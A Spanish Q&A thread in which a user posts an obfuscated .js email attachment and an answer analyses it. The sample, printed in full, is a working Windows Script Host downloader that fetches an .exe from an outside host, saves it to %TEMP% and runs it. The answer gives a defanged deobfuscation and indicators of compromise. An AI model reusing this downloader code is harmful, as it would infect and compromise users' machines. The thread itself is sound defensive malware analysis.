Archivo sospechoso .js [cerrado]


Hoy recibí un correo electrónico con el siguiente archivo adjunto, y esperaba ver si alguien podía ayudarme a entender de qué se trataba:

// --- Analyst notes: the sample below is kept byte-for-byte; only comments were added. ---
// Every line in this file that starts with "//}", "///**" or "//  Support:" is a
// comment copied from jQuery's Sizzle selector engine (note "Sizzle.support",
// "Sizzle.setDocument", "Sizzle.isXML"). None of it executes and none of it relates
// to the code around it; it is padding so the file resembles a known library at a glance.
//
// Obfuscation technique: strings are assembled with "+" from fragments, several of
// which are comma-expressions such as ("appreciated","projection","layman","pKDO").
// The comma operator yields its LAST operand, so the decoy words are discarded.
// Decoded string table (tDPsXdcAz):
//   [0] "iKouDpKDO"                (never referenced)
//   [1] "gUAsiPL"                  (never referenced)
//   [2] "ExpandEnvironmentStrings"
//   [3] "%TEMP%"
//   [4] "/TLoFtauxO.exe"
//   [5] "Run"
//   [6] "ActiveXObject"
//   [7] "WScript.Shell"
//   [8] "pkhpRI"                   (never referenced)
//   [9] "MSXML2.XMLHTTP"
//} Expose support vars for convenience support = Sizzle.support = {};
var tDPsXdcAz = ["iK"+"ou"+"D"+("appreciated","projection","layman","pKDO"), "gU"+"As"+("ceremony","pillage","knuckle","translator","i")+"PL", "ExpandE"+"nviro"+("child","somalia","conducive","seattle","nmen")+"tStri"+("restitution","claim","propitiatory","catalogues","ngs"), "%"+"T"+("artwork","southeast","modified","regional","EM")+("handjob","taurus","congenital","amount","P%"), "/TLoFtauxO" + "."+("shambles","cheque","e")+"xe", "R"+("dictionaries","celibate","penguin","un"), "Act"+("precipitated","characterize","periodically","i")+"v"+"eX"+("seraphic","resources","equipment","O")+"b"+("blowjobs","forbes","j")+"ect", "W"+"Sc"+("fusillade","oligarchy","camcorders","unlawful","r")+"ipt."+("sudan","looksmart","nathan","S")+"he"+"ll", "pk"+"h"+"p"+("godfather","absences","laughing","falstaff","RI"), "M"+("fingering","streets","sententious","delete","S")+("cacao","hilarity","potential","XM")+"L2"+".XML"+("compounds","beryl","employ","H")+"T"+("databases","berber","cholera","impost","TP")];
//}  Update global variables  document = doc;  docElem = document.documentElement;  documentIsHTML = !isXML( document );
// 100+66-16*10 === 6, so this is this["ActiveXObject"]: the COM object constructor.
// Its presence is what ties the script to Windows Script Host / Internet Explorer.
// (`this` at top level is presumably the global object -- confirm for the host in question.)
var aBRrBqnaf = this[tDPsXdcAz[100+66-16*10]];
// new ActiveXObject("WScript.Shell") -- used later for ExpandEnvironmentStrings and Run.
var FnDeQcR = new aBRrBqnaf(tDPsXdcAz[7]);
///**  * Sets document-related variables once based on the current document  * @param {Element|Object} [doc] An element or document object to use to set the document  * @returns {Object} Returns the current document  */ setDocument = Sizzle.setDocument = function( node ) {  var hasCompare, parent,   doc = node ? node.ownerDocument || node : preferredDoc;
// new ActiveXObject("MSXML2.XMLHTTP") -- the HTTP client that fetches the payload.
var yrVpImgc = new aBRrBqnaf(tDPsXdcAz[9]);
///**  * Detects XML nodes  * @param {Element|Object} elem An element or a document  * @returns {Boolean} True iff elem is a non-HTML XML node  */ isXML = Sizzle.isXML = function( elem ) {   documentElement is verified for cases where it doesn\"t yet exist   (such as loading iframes in IE - #4833)  var documentElement = elem && (elem.ownerDocument || elem).documentElement;  return documentElement ? documentElement.nodeName !== \"HTML\" : false; };
// Drop path: ExpandEnvironmentStrings("%TEMP%") + "/TLoFtauxO.exe", i.e.
// %TEMP%/TLoFtauxO.exe (forward slash exactly as the sample writes it).
// Indicator to look for on any machine that opened this attachment.
var HlkTy = FnDeQcR[tDPsXdcAz[2]](tDPsXdcAz[3]) + tDPsXdcAz[4];
//  Return early if doc is invalid or already selected  if ( doc === document || doc.nodeType !== 9 || !doc.documentElement ) {   return document;  
// Completion handler for the XMLHTTP request: yrVpImgc["onreadystatechange"] = function () {...}.
// When the request reports readystate 4 (done), the response body is written to disk
// through an ADODB.Stream. The interleaved "//  Support: IE..." lines are Sizzle
// comments with no relation to this code (decoys); the sample is kept byte-for-byte.
yrVpImgc[("paralysis","saucer","phenomenal","andreas","onr")+"eadystatech"+("addressing","playstation","a")+"nge"] = function () {
    // "readystate" (lower-case s as written; COM name lookup is presumably
    // case-insensitive here -- confirm) === 4: the response has been received.
    if (yrVpImgc[("versions","responded","re")+"adys"+"t"+("petition","ridley","a")+("loiter","jurisdiction","te")] === 4) {
        // new ActiveXObject("ADODB.Stream") via the same constructor as above.
        var lgNaqHj = new aBRrBqnaf(("forensic","destroyer","bourgeoisie","AD")+"O"+("triton","nutritional","D")+"B."+"S"+("higher","lesson","governmental","nominated","tr")+"e"+"am");
        // stream.open()
        lgNaqHj["o"+("camden","federation","p")+"en"]();
        //  Support: IE 9-11, Edge   Accessing iframe documents after unload throws \"permission denied\" errors (jQuery #13936)  if ( (parent = document.defaultView) && parent.top !== parent ) {    Support: IE 11   if ( parent.addEventListener ) {    parent.addEventListener( \"unload\", unloadHandler, false );
        // stream.type = 1 -- NOTE(review): 1 is adTypeBinary per the ADO docs (not shown here); verify.
        lgNaqHj["t"+"y"+("cameras","vapid","people","pe")] = 1;
        //   Support: IE 9 - 10 only   } else if ( parent.attachEvent ) {    parent.attachEvent( \"onunload\", unloadHandler );   }  
        // stream.write(xmlhttp["ResponseBody"]) -- the raw bytes of the downloaded .exe.
        lgNaqHj["w"+"ri"+("pungent","gratis","slammed","pander","te")](yrVpImgc[("printed","sorrel","kuwait","Re")+("optics","twenty-first","savoury","retract","sp")+("strange","emptiness","loathe","o")+("astonish","milfhunter","snail","previously","nse")+"B"+"ody"]);
        //} /* Attributes  ---------------------------------------------------------------------- */
        // stream.position = 0 -- rewind before saving.
        lgNaqHj["p"+"o"+"s"+("runner","italics","named","abashed","ition")] = 0;
        //  Support: IE<8   Verify that getAttribute really returns attributes and not properties   (excepting IE8 booleans)  support.attributes = assert(function( div ) {   div.className = \"i\";   return !div.getAttribute(\"className\");  });
        // Write %TEMP%/TLoFtauxO.exe. NOTE(review): the second argument, 2, is
        // adSaveCreateOverWrite per the ADO docs (not shown here); verify.
        lgNaqHj.saveToFile(HlkTy, 2);
        // /* getElement(s)By*  ---------------------------------------------------------------------- */
        lgNaqHj.close();
        //  Check if getElementsByTagName(\"*\") returns only elements  support.getElementsByTagName = assert(function( div ) {   div.appendChild( document.createComment(\"\") );   return !div.getElementsByTagName(\"*\").length;  });
    };
};
// Download-and-execute sequence. Everything is wrapped in try/catch with an empty
// catch, so any failure (no network, blocked ActiveX, write error) is silent.
// The "//  Support: ..." and "//  ID find ..." lines are Sizzle decoy comments.
try {

    //  Support: IE<9  support.getElementsByClassName = rnative.test( document.getElementsByClassName );
    // xmlhttp.open("GET", "hxxp://magic-beauty[.]com[.]ua/system/logs/98yhb764d.exe", false)
    // Plain HTTP, and the third argument is false -- the XMLHTTP async flag, so the
    // call below to send() presumably blocks until the response has arrived and the
    // onreadystatechange handler has already written the file (confirm against MSXML docs).
    yrVpImgc[("impurity","birds","enormity","cliff","o")+"p"+"en"](("nullify","scheme","G")+"ET", ("malaria","advantage","truncheon","tutelary","http://magic")+("cinderella","frontal","musicians","-")+"beau"+"ty."+"com.ua/system/logs/98yhb764d.exe", false);

    //  Support: IE<10   Check if getElementById returns elements by name   The broken getElementById methods don\"t pick up programatically-set names,   so use a roundabout getElementsByName test  support.getById = assert(function( div ) {   docElem.appendChild( div ).id = expando;   return !document.getElementsByName || !document.getElementsByName( expando ).length;  });
    // xmlhttp.send()
    yrVpImgc[("sleeper","audit","docility","s")+("majority","broadside","nerve","e")+"nd"]();
    //  ID find and filter  if ( support.getById ) {   Expr.find[\"ID\"] = function( id, context ) {    if ( typeof context.getElementById !== \"undefined\" && documentIsHTML ) {     var m = context.getElementById( id );     return m ? [ m ] : [];    }   };   Expr.filter[\"ID\"] = function( id ) {    var attrId = id.replace( runescape, funescape );    return function( elem ) {     return elem.getAttribute(\"id\") === attrId;    };   };  } else {    Support: IE6/7    getElementById is not reliable as a find shortcut   delete Expr.find[\"ID\"];
    // shell["Run"](dropPath, 1, false): launches %TEMP%/TLoFtauxO.exe. The third argument,
    // "zEAKvfO" === "wJLlIbR", is a constant false dressed up as a comparison.
    // The trailing assignment to gdlRktXq stores a dead string of Sizzle text and is never read.
    FnDeQcR[tDPsXdcAz[5]](HlkTy, 1, "zEAKvfO" === "wJLlIbR"); gdlRktXq = "    DocumentFragment nodes don\"t have gEBTN    } else if ( support.qsa ) {     return context.querySelectorAll( tag );    }   } :";
    //  Expr.filter[\"ID\"] = function( id ) {    var attrId = id.replace( runescape, funescape );    return function( elem ) {     var node = typeof elem.getAttributeNode !== \"undefined\" &&      elem.getAttributeNode(\"id\");     return node && node.value === attrId;    };   };  
} catch (SJtAtG) { };
//}  Tag  Expr.find[\"TAG\"] = support.getElementsByTagName ?   function( tag, context ) {    if ( typeof context.getElementsByTagName !== \"undefined\" ) {     return context.getElementsByTagName( tag );
    
pregunta Justin 09.03.2016 - 15:16

1 respuesta


Esto es un *downloader* malicioso entregado como adjunto de correo, no un drive-by: no explota ninguna vulnerabilidad del navegador, sino que depende de que la víctima abra el `.js`, que Windows ejecuta por defecto con Windows Script Host (por eso el código usa `ActiveXObject`, `WScript.Shell`, `MSXML2.XMLHTTP` y `ADODB.Stream`, objetos que no existen fuera de ese entorno o de Internet Explorer).

Consejo: cuando vea código ofuscado, en cualquier lenguaje, aplique esta sencilla regla:

  • La ofuscación por sí sola no prueba malicia (la minificación y el empaquetado son rutinarios en código web legítimo), pero un script ofuscado que llega sin pedirlo como adjunto de correo, construye sus cadenas a partir de listas de palabras señuelo y acaba invocando `WScript.Shell`, `MSXML2.XMLHTTP` y `ADODB.Stream` debe tratarse como hostil hasta que se demuestre lo contrario.

En cualquier caso, no quiere que este código se ejecute (a menos que su trabajo sea crear malware). Si necesita analizarlo, hágalo de forma estática, como se hace a continuación, o en una máquina virtual aislada y sin acceso a red.

Incluso los comentarios intentan engañarte: están copiados literalmente del motor de selectores Sizzle de jQuery (`Sizzle.support`, `Sizzle.setDocument`, `Sizzle.isXML`), no guardan ninguna relación con el código que los rodea y solo sirven para que el archivo parezca una librería conocida a simple vista.

    //  Support: IE<8   Verify that getAttribute really returns attributes and not properties   (excepting IE8 booleans)  support.attributes = assert(function( div ) {   div.className = \"i\";   return !div.getAttribute(\"className\");  });
    lgNaqHj.saveToFile(HlkTy, 2);

Sí, porque necesitamos un ADODB Stream que utiliza saveToFile() para guardar archivos ejecutables en nuestra computadora para verificar que getAttribute() realmente devuelva atributos y no propiedades. (sarcasm)

El código desofuscado

Para responder a su pregunta, y como esto se migró recientemente de Seguridad de la información a Ingeniería inversa, sentí de nuevo que esta respuesta ya no estaba a la altura de los estándares de calidad, por lo que tendré que aclarar todo. Lo hago a continuación.

Desofusqué el código casi en su totalidad. Es una lectura, no una transcripción literal: en la muestra los ProgID (`WScript.Shell`, `MSXML2.XMLHTTP`, `ADODB.Stream`) van entre comillas, la ruta de destino lleva una barra (`%TEMP%/TLoFtauxO.exe`), y `open()` se llama como `open("GET", url, false)`, es decir, de forma síncrona:

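// String table recovered from the sample. In the original each entry is a chain of
// "+" concatenations over comma-expressions such as
// ("appreciated","projection","layman","pKDO"); the comma operator yields only its
// last operand, so every decoy word before it is discarded. Indices are the ones the
// sample uses (e.g. this[haxArray[100+66-16*10]], i.e. index 6). Entries 0, 1 and 8
// are never referenced by the sample.
const haxArray = [
    "iKouDpKDO",                // 0: unreferenced filler
    "gUAsiPL",                  // 1: unreferenced filler
    "ExpandEnvironmentStrings", // 2: WScript.Shell method used to resolve %TEMP%
    "%TEMP%",                   // 3: argument to the method above
    "/TLoFtauxO.exe",           // 4: appended to the expanded %TEMP% (slash as in the sample)
    "Run",                      // 5: WScript.Shell method that launches the dropped file
    "ActiveXObject",            // 6: looked up on top-level `this` (presumably the global object)
    "WScript.Shell",            // 7: ProgID passed to ActiveXObject
    "pkhpRI",                   // 8: unreferenced filler
    "MSXML2.XMLHTTP",           // 9: ProgID of the HTTP client used for the download
];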

// Create ActiveXObject instance, a new WScript Shell, and an MSXML HTTP connection
// In the sample this is this[tDPsXdcAz[6]], i.e. this["ActiveXObject"].
var dumbFunc = this.ActiveXObject;
// NOTE(review): in the sample the ProgIDs are string literals -- new ActiveXObject("WScript.Shell")
// and new ActiveXObject("MSXML2.XMLHTTP"). Written unquoted as below they would be property
// lookups, not the strings the sample builds; read them as "WScript.Shell" / "MSXML2.XMLHTTP".
var wScriptShell = new dumbFunc(WScript.Shell);
var xmlHttp = new dumbFunc(MSXML2.XMLHTTP);

// Will save file to %TEMP%\TLoFtauxO.exe
// NOTE(review): the sample expands "%TEMP%" alone and then appends "/TLoFtauxO.exe"
// (with a forward slash), giving %TEMP%/TLoFtauxO.exe; the concatenation below drops
// that separator, so the path shown here is not exactly what the sample writes.
var fileLocation = wScriptShell.ExpandEnvironmentStrings("%TEMP%" + "TLoFtauxO.exe");

// Completion handler: once the request reports readystate 4 (done), the response bytes
// are written to disk through an ADODB.Stream. Matches the sample's sequence
// open -> type = 1 -> write(ResponseBody) -> position = 0 -> saveToFile(path, 2) -> close.
xmlHttp.onreadystatechange = function() 
{
    // "readystate" is spelled with a lower-case s in the sample too; COM name lookup is
    // presumably case-insensitive for this host -- confirm.
    if (xmlHttp.readystate === 4) {
        // NOTE(review): the sample passes the ProgID as the string "ADODB.Stream".
        var adoDbStream = new dumbFunc(ADODB.Stream);
        adoDbStream.open();
        // NOTE(review): 1 is adTypeBinary per the ADO docs (not shown here); verify.
        adoDbStream.type = 1;
        // Raw bytes of the downloaded executable.
        adoDbStream.write(xmlHttp.ResponseBody);
        adoDbStream.position = 0;
        // NOTE(review): 2 is adSaveCreateOverWrite per the ADO docs (not shown here); verify.
        adoDbStream.saveToFile(fileLocation, 2);
        adoDbStream.close();
    };
};
// Download-and-execute sequence, wrapped in a try/catch whose empty catch swallows
// every error, so failures leave nothing visible to the victim.
try {
    // NOTE(review): the sample's call is open("GET", "http://magic-beauty.com.ua/...", false).
    // The URL is deliberately defanged here ("hxxp") so this listing cannot be run as-is.
    // The sample's third argument, false, is the XMLHTTP async flag: with it the send()
    // below presumably blocks until the response arrives, so the handler above has
    // already written the file by the time run() is reached (confirm against MSXML docs).
    xmlHttp.open("hxxp://magic-beauty.com.ua/system/logs/98yhb764d.exe");
    xmlHttp.send();
    // Launch %TEMP%/TLoFtauxO.exe. In the sample the third argument is
    // "zEAKvfO" === "wJLlIbR", a constant false dressed up as a comparison.
    wScriptShell.run(fileLocation, 1, false);
    // Dead store of Sizzle text, never read -- more padding.
    messageThing = "    DocumentFragment nodes don\"t have gEBTN    } else if ( support.qsa ) {     return context.querySelectorAll( tag );    }   } :";
} catch (SJtAtG) {};

Te veo, un ladrón en el techo; Veo latir tu corazón, veo que tienes miedo.

Entonces, ¿qué intenta hacer este código?

Intenta descargar un archivo llamado 98yhb764d.exe desde magic-beauty[.]com[.]ua por HTTP sin cifrar y guardarlo en su computadora como TLoFtauxO.exe dentro de la carpeta temporal de Windows, siempre y cuando tenga definida la variable de entorno %TEMP%, lo que ocurre por defecto. Como la petición es síncrona, el archivo ya está escrito cuando `Run` lo lanza justo después; cualquier error se traga en el `catch` vacío, así que un fallo no deja ningún rastro visible para el usuario.

Nunca asumas que el código ofuscado es legítimo por alguna razón (nota al margen: la minificación y la ofuscación son dos conceptos diferentes), y estarás bien. Si abriste el adjunto, trata el equipo como comprometido: busca `%TEMP%\TLoFtauxO.exe` y conexiones hacia `magic-beauty[.]com[.]ua` en tus registros, y visita el hilo: ¿Cómo trato con un servidor comprometido?

    
respondido por el Mark Buffalo 09.03.2016 - 15:27
